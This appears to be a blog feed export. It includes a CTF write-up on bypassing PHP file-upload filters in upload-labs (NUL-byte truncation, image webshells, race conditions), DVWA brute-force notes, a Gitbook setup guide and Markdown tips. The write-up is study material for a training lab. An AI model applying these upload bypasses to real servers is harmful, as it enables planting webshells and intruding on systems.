class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>save_path now arrives via POST:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$img_path = $_POST[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br></pre></td></tr></table></figure><p>Still the same NUL-byte truncation, but this time the 0x00 byte has to be written into the request body itself (e.g. by editing the hex view in an intercepting proxy), because a multipart/form-data body is not URL-decoded the way the GET query string is: a literal %00 in a POST field stays as the three characters %, 0, 0. The same magic_quotes_gpc and PHP <5.3.4 preconditions apply.</p><h2 id="第13关-图马"><a href="#第13关-图马" class="headerlink" title="Pass-13: image webshell"></a>Pass-13: image webshell</h2><figure class="highlight 
php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span><span class="params">($filename)</span></span>{</span><br><span class="line"> $file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line"> $bin = fread($file, <span class="number">2</span>); <span class="comment">//reads only 2 bytes</span></span><br><span class="line"> fclose($file);</span><br><span class="line"> $strInfo = @unpack(<span class="string">"C2chars"</span>, $bin); 
</span><br><span class="line"> $typeCode = intval($strInfo[<span class="string">'chars1'</span>].$strInfo[<span class="string">'chars2'</span>]); </span><br><span class="line"> $fileType = <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">switch</span>($typeCode){ </span><br><span class="line"> <span class="keyword">case</span> <span class="number">255216</span>: </span><br><span class="line"> $fileType = <span class="string">'jpg'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">13780</span>: </span><br><span class="line"> $fileType = <span class="string">'png'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="number">7173</span>: </span><br><span class="line"> $fileType = <span class="string">'gif'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: </span><br><span class="line"> $fileType = <span class="string">'unknown'</span>;</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> $fileType;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $file_type = getReailFileType($temp_file);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>($file_type == <span 
class="string">'unknown'</span>){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_type;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The getReailFileType function reads only the first two bytes of the file, concatenates their decimal values as a string and compares the result with the magic numbers of JPEG (bytes FF D8, read as 255216), PNG (89 50, read as 13780) and GIF (47 49, read as 7173):</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line">$bin = fread($file, <span class="number">2</span>); <span class="comment">//reads only 2 bytes</span></span><br></pre></td></tr></table></figure><p>So a forged file header is all that is needed; an image webshell (a real image, or just the GIF89a header, with PHP code appended) passes easily. Note that the file is saved with the detected image extension, so to actually execute the code this has to be combined with a file inclusion vulnerability.</p><h2 id="第14关-getimagesize"><a href="#第14关-getimagesize" class="headerlink" title="Pass-14: getimagesize"></a>Pass-14: getimagesize</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span><span class="params">($filename)</span></span>{</span><br><span class="line"> $types = <span class="string">'.jpeg|.png|.gif'</span>;</span><br><span class="line"> <span class="keyword">if</span>(file_exists($filename)){</span><br><span class="line"> $info = getimagesize($filename);</span><br><span class="line"> $ext = image_type_to_extension($info[<span class="number">2</span>]);</span><br><span class="line"> <span class="keyword">if</span>(stripos($types,$ext)>=<span class="number">0</span>){</span><br><span class="line"> <span class="keyword">return</span> $ext;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span 
class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $res = isImage($temp_file);</span><br><span class="line"> <span class="keyword">if</span>(!$res){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).$res;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The file header is validated with getimagesize():</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$info = getimagesize($filename);</span><br></pre></td></tr></table></figure><p>An image webshell bypasses this too: getimagesize() parses the image header to determine the dimensions and type and ignores trailing data, so a valid image with PHP appended is still reported as a JPEG/PNG/GIF. (The $types check in isImage is also ineffective: stripos() returns false when $ext is not found, and in PHP false >= 0 evaluates to true, so any type that getimagesize() recognises is accepted and saved with its own extension.) As in Pass-13, executing the payload requires a file inclusion vulnerability.</p><h2 id="第15关-exif-imagetype"><a href="#第15关-exif-imagetype" class="headerlink" title="Pass-15: exif_imagetype"></a>Pass-15: exif_imagetype</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span><span class="params">($filename)</span></span>{</span><br><span class="line"> <span class="comment">//requires the php_exif extension to be enabled</span></span><br><span class="line"> $image_type = exif_imagetype($filename);</span><br><span class="line"> <span class="keyword">switch</span> ($image_type) {</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_GIF:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"gif"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_JPEG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"jpg"</span>;</span><br><span class="line"> <span 
class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_PNG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"png"</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $res = isImage($temp_file);</span><br><span class="line"> <span class="keyword">if</span>(!$res){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$res;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span 
class="meta">?></span></span><br></pre></td></tr></table></figure><p>exif_imagetype() from the php_exif extension is used to determine the file type. It inspects only the signature bytes at the start of the file, just like getimagesize(), so an image webshell still bypasses it directly:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$image_type = exif_imagetype($filename);</span><br></pre></td></tr></table></figure><h2 id="第16关-二次渲染绕过"><a href="#第16关-二次渲染绕过" class="headerlink" title="Pass-16: second-render bypass"></a>Pass-16: second-render bypass</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 
class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="comment">// get the basic information of the uploaded file: name, type, size, temporary path</span></span><br><span class="line"> $filename = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> $filetype = $_FILES[<span class="string">'upload_file'</span>][<span 
class="string">'type'</span>];</span><br><span class="line"> $tmpname = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"></span><br><span class="line"> $target_path=UPLOAD_PATH.<span class="string">'/'</span>.basename($filename);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// get the extension of the uploaded file</span></span><br><span class="line"> $fileext= substr(strrchr($filename,<span class="string">"."</span>),<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//check the extension and the MIME type; only proceed with the upload if both are valid</span></span><br><span class="line"> <span class="keyword">if</span>(($fileext == <span class="string">"jpg"</span>) && ($filetype==<span class="string">"image/jpeg"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($tmpname,$target_path)){</span><br><span class="line"> <span class="comment">//generate a new image from the uploaded one</span></span><br><span class="line"> $im = imagecreatefromjpeg($target_path);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>($im == <span class="keyword">false</span>){</span><br><span class="line"> $msg = <span class="string">"该文件不是jpg格式的图片!"</span>;</span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//assign a filename to the new image</span></span><br><span class="line"> srand(time());</span><br><span class="line"> $newfilename = strval(rand()).<span class="string">".jpg"</span>;</span><br><span class="line"> <span class="comment">//display the re-rendered image (the new image generated from the user's upload)</span></span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$newfilename;</span><br><span class="line"> imagejpeg($im,$img_path);</span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> $is_upload = <span 
class="keyword">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>(($fileext == <span class="string">"png"</span>) && ($filetype==<span class="string">"image/png"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($tmpname,$target_path)){</span><br><span class="line"> <span class="comment">//generate a new image from the uploaded one</span></span><br><span class="line"> $im = imagecreatefrompng($target_path);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>($im == <span class="keyword">false</span>){</span><br><span class="line"> $msg = <span class="string">"该文件不是png格式的图片!"</span>;</span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//assign a filename to the new image</span></span><br><span class="line"> srand(time());</span><br><span class="line"> $newfilename = strval(rand()).<span class="string">".png"</span>;</span><br><span class="line"> <span class="comment">//display the re-rendered image (the new image generated from the user's upload)</span></span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$newfilename;</span><br><span class="line"> imagepng($im,$img_path);</span><br><span class="line"></span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> $is_upload = <span class="keyword">true</span>; </span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span 
class="keyword">if</span>(($fileext == <span class="string">"gif"</span>) && ($filetype==<span class="string">"image/gif"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($tmpname,$target_path)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> $im = imagecreatefromgif($target_path);</span><br><span class="line"> <span class="keyword">if</span>($im == <span class="keyword">false</span>){</span><br><span class="line"> $msg = <span class="string">"该文件不是gif格式的图片!"</span>;</span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> $newfilename = strval(rand()).<span class="string">".gif"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$newfilename;</span><br><span class="line"> imagegif($im,$img_path);</span><br><span class="line"></span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">"只允许上传后缀为.jpg|.png|.gif的图片文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>本关综合判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染.</p><p><a href="https://yang1k.github.io/2018/08/30/upload-pass16/" target="_blank" 
rel="noopener">https://yang1k.github.io/2018/08/30/upload-pass16/</a></p><h2 id="第17关-条件竞争"><a href="#第17关-条件竞争" class="headerlink" title="第17关 条件竞争"></a>第17关 条件竞争</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_name = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $file_ext = substr($file_name,strrpos($file_name,<span class="string">"."</span>)+<span 
class="number">1</span>);</span><br><span class="line"> $upload_file = UPLOAD_PATH . <span class="string">'/'</span> . $file_name;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file, $upload_file)){</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $img_path = UPLOAD_PATH . <span class="string">'/'</span>. rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"> rename($upload_file, $img_path);</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> unlink($upload_file);</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>利用条件竞争删除文件时间差绕过。这里先将文件上传到服务器,然后通过rename修改名称:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$upload_file = UPLOAD_PATH . <span class="string">'/'</span> . $file_name;</span><br><span class="line">$img_path = UPLOAD_PATH . <span class="string">'/'</span>. 
rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line">rename($upload_file, $img_path);</span><br></pre></td></tr></table></figure><p>再通过unlink删除文件:</p><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unlink</span>($upload_file);</span><br></pre></td></tr></table></figure><p>因此可以通过条件竞争的方式在unlink之前,访问webshell。</p>]]></content>
<summary type="html">
</summary>
<category term="CTF" scheme="https://singlemindedt.github.io/tags/CTF/"/>
<category term="Upload" scheme="https://singlemindedt.github.io/tags/Upload/"/>
</entry>
<entry>
<title>DVWA相关记录</title>
<link href="https://singlemindedt.github.io/2020/08/02/DVWA%E7%9B%B8%E5%85%B3%E8%AE%B0%E5%BD%95/"/>
<id>https://singlemindedt.github.io/2020/08/02/DVWA相关记录/</id>
<published>2020-08-02T06:09:37.000Z</published>
<updated>2020-08-02T07:51:48.970Z</updated>
<content type="html"><![CDATA[<p>Access it from the web root by the directory name:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Mine: http://127.0.0.1/DVWA-master/</span><br></pre></td></tr></table></figure>
<p>Log in with <code>admin</code> & <code>password</code>;</p>
<p>Example: the password is known to be 4 digits; brute-force it.</p>
<p>Link: <a href="http://10.20.64.138/brute.php" target="_blank" rel="noopener">http://10.20.64.138/brute.php</a></p>
<p>GET request; the page responds with</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">pass is error</span><br><span class="line">hint: isset($_REQUEST['pass'])</span><br></pre></td></tr></table></figure>
<p>Visit:</p>
<p><code>http://10.20.64.138/brute.php?pass=1234</code></p>
<ul><li><strong>Intercept the request with Burp Suite,</strong></li></ul>
<ul><li><strong>Send to Intruder</strong></li></ul>
<p>Payload Positions: mark the position to attack</p>
<ul><li><strong>Payloads</strong></li></ul>
<p>In the Payload Sets section, set the type to Number;</p>
<p>Random</p>
<p>Number format</p>
<p>+++</p>
<p>Custom iterator</p>]]></content>
<summary type="html">
</summary>
<category term="DVWA" scheme="https://singlemindedt.github.io/tags/DVWA/"/>
</entry>
<entry>
<title>Gitbook安装与使用</title>
<link href="https://singlemindedt.github.io/2020/08/01/Gitbook%E5%AE%89%E8%A3%85%E4%B8%8E%E4%BD%BF%E7%94%A8/"/>
<id>https://singlemindedt.github.io/2020/08/01/Gitbook安装与使用/</id>
<published>2020-08-01T04:34:24.000Z</published>
<updated>2020-08-01T05:59:29.508Z</updated>
<content type="html"><![CDATA[<h1 id="安装"><a href="#安装" class="headerlink" title="Installation"></a>Installation</h1>
<ol><li><p>Recommended combination: Git + Gitbook + Typora</p></li><li><p>Environment:</p><ul><li>GitBook is built on Node.js, so Node.js has to be installed first (installing Node.js also installs npm, the Node package manager, so npm does not need a separate install)</li></ul></li><li><p>Install Gitbook</p></li></ol>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">npm install -g gitbook-cli</span><br></pre></td></tr></table></figure>
<p>Wait for the installation to finish.</p>
<h1 id="使用"><a href="#使用" class="headerlink" title="Usage"></a>Usage</h1>
<p>Create a new folder, for example MyGitBook, and run <code>gitbook init</code> on the command line;</p>
<p>+++</p>
<p><font color="#ff0000" size="5" face="黑体">Note:</font></p>
<p>You may run into the following problem:</p>
<p><img src="https://s1.ax1x.com/2020/08/01/a370BD.png" alt="a370BD.png"></p>
<p>or</p>
<p><strong>installing gitbook xxx takes far too long</strong></p>
<p><font color="#ff0000" size="4" face="黑体">Solution:</font></p>
<p>The installation uses a registry outside China by default, which is slow or times out; switch it to a domestic mirror:</p>
<ul><li>On the command line: <code>npm config set registry=http://registry.npm.taobao.org</code> sets the registry directly</li><li>Or open node_modules\npm\npmrc under the Node.js installation folder and add the setting <code>registry=http://registry.npm.taobao.org</code></li></ul>
<p>+++</p>
<p>Once <code>Installing GitBook 3.2.3</code> has finished, it looks like this:</p>
<p><img src="https://s1.ax1x.com/2020/08/01/a37wnO.png" alt="a37wnO.png"></p>
<p>README.md and SUMMARY.md are created under MyGitBook;</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">- GitBook</span><br><span class="line"> - README.md (introduction file)</span><br><span class="line"> - SUMMARY.md (table-of-contents file)</span><br></pre></td></tr></table></figure>
<p>+++</p>
<p>Running <code>gitbook serve</code> in the terminal starts a server on <code>localhost:4000</code>; open <code>http://localhost:4000</code> in the browser to reach it.</p>
<p><img src="https://s1.ax1x.com/2020/08/01/a37rAH.png" alt="a37rAH.png"></p>
<p><img src="https://s1.ax1x.com/2020/08/01/a37BHe.png" alt="a37BHe.png"></p>
<p>+++</p>
<p>At this point a <code>_book</code> directory is generated under MyGitBook, containing index.html and some configuration files;</p>
<p><code>gitbook serve</code> itself includes the <code>gitbook build</code> command; running <code>gitbook build</code> builds the book and by default writes the generated static site to the _book directory;</p>
<p>+++</p>
<p>References:</p>
<p><a href="https://blog.csdn.net/weixin_34293141/article/details/91413019" target="_blank" rel="noopener">1</a></p>
<p><a href="https://blog.csdn.net/lu_embedded/article/details/81100704?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param" target="_blank" rel="noopener">2</a></p>]]></content>
<summary type="html">
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
</entry>
<entry>
<title>Markdown语法记录</title>
<link href="https://singlemindedt.github.io/2020/07/31/Markdown%E8%AF%AD%E6%B3%95%E8%AE%B0%E5%BD%95/"/>
<id>https://singlemindedt.github.io/2020/07/31/Markdown语法记录/</id>
<published>2020-07-31T15:51:42.000Z</published>
<updated>2020-11-10T06:38:55.481Z</updated>
<content type="html"><![CDATA[<ol><li><p>Color, font, size<br> <font color="#ff000" face="黑体" size="4">测试0</font></p><figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag"><<span class="name">font</span> <span class="attr">color</span>=<span class="string">#ff000</span> <span class="attr">face</span>=<span class="string">"黑体"</span> <span class="attr">size</span>=<span class="string">4</span>></span>测试0<span class="tag"></<span class="name">font</span>></span></span><br></pre></td></tr></table></figure></li></ol>
<p> <font color="#000000" face="华文彩云" size="4">测试1</font></p> <figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag"><<span class="name">font</span> <span class="attr">color</span> =<span class="string">#000000</span> <span class="attr">face</span> =<span class="string">"华文彩云"</span> <span class="attr">size</span>=<span class="string">4</span>></span>测试1<span class="tag"></<span class="name">font</span>></span></span><br></pre></td></tr></table></figure>
<ol start="2"><li>Comments</li></ol>
<ul><li><strong>Code approach</strong></li></ul>
